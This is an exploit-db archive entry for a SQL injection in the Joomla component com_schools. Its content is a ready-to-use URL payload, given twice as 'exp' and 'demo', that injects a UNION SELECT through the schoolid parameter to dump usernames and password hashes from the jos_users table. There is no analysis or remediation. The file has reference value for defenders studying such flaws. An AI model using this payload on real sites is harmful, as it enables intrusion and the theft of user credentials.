exploit-db-mirror/exploits/php/webapps/10640.txt

Joomla Component com_schools SQL injection
author:Mr.tro0oqy
email:t.4@windowslive.com


exp:
http://server/path/index.php?option=com_schools&Itemid=89&schoolid=-53+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7,8,9,10,11+from+jos_users--






demo :


http://server/index.php?option=com_schools&Itemid=89&schoolid=-53+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7,8,9,10,11+from+jos_users--




qtaaaaaaaaf :)